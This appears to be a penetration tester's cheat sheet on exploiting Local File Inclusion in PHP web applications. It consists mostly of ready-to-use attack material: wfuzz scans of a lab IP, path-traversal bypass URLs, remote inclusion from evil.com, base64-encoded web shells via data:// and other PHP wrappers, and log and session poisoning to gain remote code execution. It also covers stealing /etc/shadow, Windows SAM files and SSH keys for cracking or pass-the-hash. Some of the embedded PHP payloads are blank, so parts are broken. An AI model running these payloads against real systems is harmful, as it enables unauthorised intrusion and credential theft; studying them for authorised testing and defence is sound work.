# Local File Inclusion
### Fuzzing with wfuzz
{% embed url="" %}
The key is taking a look at unusual responses and filtering them using `-hh`, for example in this case most responses had a character count of around 300 characters on average, so whenever one would pop up that had 13000 it meant that the content was being displayed.
This also gives us a hint on how the Local FIle Inclusion is working.
#### Windows
{% embed url="" %}
Reference this list for LFI so we can get creds for other services around.
```
wfuzz -w /usr/share/wordlists/wfuzz/vulns/lfi-windows.txt -u http://192.168.242.53:8080/site/index.php\?page\=FUZZ
```
#### Linux
```
wfuzz -w /usr/share/wordlists/wfuzz/vulns/lfi-linux.txt -u http://192.168.242.53:8080/site/index.php\?page\=FUZZ
```
The guide above should help you depending on how the website reacts.
Look for files associated with other services around that could give you access.
* [ ] /etc/passwd and /etc/shadow
* [ ] /home/user/ssh/id\_rsa and change persmissions and ssh
* [ ] Look at services around for example filezilla stores creds for the server ftp server in cleartext.
#### LFI + TOMCAT
Look at the version of tomcat and depending on its version we can gather credentials for the manager site and gain rce by uploading a war file.
By transversing to: /usr/share/**tomcat9**/etc/tomcat-users.xml
We were able to gather credentials.
#### LFI + Redis
{% embed url="" %}
Try to enumerate where we can load files using redis, make a php reverse shell or any sort of code and we can easily use lfi to execute the code we wrote.
#### LFI + Filezilla
Using the reference list above we can gather credentials for the Filezilla FTP server.
### Bypassing Tricks
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
```
#### Null byte
This was patched since PHP 5.4
```
http://example.com/index.php?page=http://evil.com/shell.txt%00
```
#### Double encoding
```
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
```
#### From existing folder
```
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
#### Wrapper php\://filter
```
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
```
### RCE Methods
#### PHP Wrappers
**Wrapper input://**
```
curl -k -v "http://example.com/index.php?page=php://input" --data ""
```
Since we have code execution all we have to do is make sure that we get a reverse shell using different payloads from Payloads of All things.
#### Wrapper data://
```
echo '' | base64 -w0 -> PD9waHAgcGhwaW5mbygpOyA/Pgo=
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=
Or
menu.php?file=data:text/plain,
If code execution, you should see phpinfo(), go to the disable_functions and craft a payload with functions which aren't disable.
Code execution with
- exec
- shell_exec
- system
- passthru
- popen
# Exemple
echo '' | base64 -w0 -> PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=
If there is "Shell done !" on the webpage, then there is code execution and you can do things like :
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=ls
http://example.com/index.php?page=expect://id
http://example.net/?page=data://text/plain,
http://example.net/?page=data://text/plain,
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,
http://example.net/?page=data:text/plain,
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is ""
```
{% embed url="" %}
#### Wrapper Expect://
```
http://example.com/index.php?page=expect://id
```
#### Wrapper zip\://
```
echo "" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://example.com/index.php?page=zip://shell.jpg%23payload.php
```
### LFI to RCE via controlled log file
Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
```
http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/apache2/access.log
http://example.com/index.php?page=/var/log/apache2/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log
```
#### RCE via SSH
Try to ssh into the box with a PHP code as username ``.
```
ssh @10.10.10.10
```
Then include the SSH log files inside the Web Application.
```
http://example.com/index.php?page=/var/log/auth.log&cmd=id
```
### **Via** **vsftpd** ***logs***
The logs of this FTP server are stored in ***/var/log/vsftpd.log.*** If you have a LFI and can access a exposed vsftpd server, you could try to login setting the PHP payload in the username and then access the logs using the LFI
#### RCE via Mail
First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`.
```
root@kali:~# telnet 10.10.10.10. 25
Trying 10.10.10.10....
Connected to 10.10.10.10..
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: mail@example.com
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
data
354 End data with .
subject:
data2
.
```
In some cases you can also send the email with the `mail` command line.
```
mail -s "" www-data@10.10.10.10. < /dev/null
```
#### RCE via Apache logs
Poison the User-Agent in access logs:
```
$ curl http://example.org/ -A ""
```
Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
Then request the logs via the LFI and execute your command.
```
$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id
```
```
kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
' . shell_exec($_GET['cmd']) . '';?>
HTTP/1.1 400 Bad Request
```
Reagardless we are still able to access the C:\xampp\apache\logs\access.log and execute the shell.
### LFI to RCE via PHP sessions
Check if the website use PHP Session (PHPSESSID)
```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
In PHP these sessions are stored into /var/lib/php5/sess\_\[PHPSESSID] or /var/lib/php/session/sess\_\[PHPSESSID] files
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
```
Set the cookie to ``
```
login=1&user=&pass=password&lang=en_us.php
```
Use the LFI to include the PHP session file
```
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
```
### LFI to RCE via credentials files
This method require high privileges inside the application in order to read the sensitive files.
#### Windows version
First extract `sam` and `system` files.
```
http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
http://example.com/index.php?page=../../../../../../WINDOWS/repair/system
```
Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique.
#### Linux version
First extract `/etc/shadow` files.
```
http://example.com/index.php?page=../../../../../../etc/shadow
```
Then crack the hashes inside in order to login via SSH on the machine.
Another way to gain SSH access to a Linux machine through LFI is by reading the private key file, id\_rsa. If SSH is active check which user is being used `/proc/self/status` and `/etc/passwd` and try to access `//.ssh/id_rsa`.
Examples of Local File Inclusion Exploitation
(Slort PG)
### Resources
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}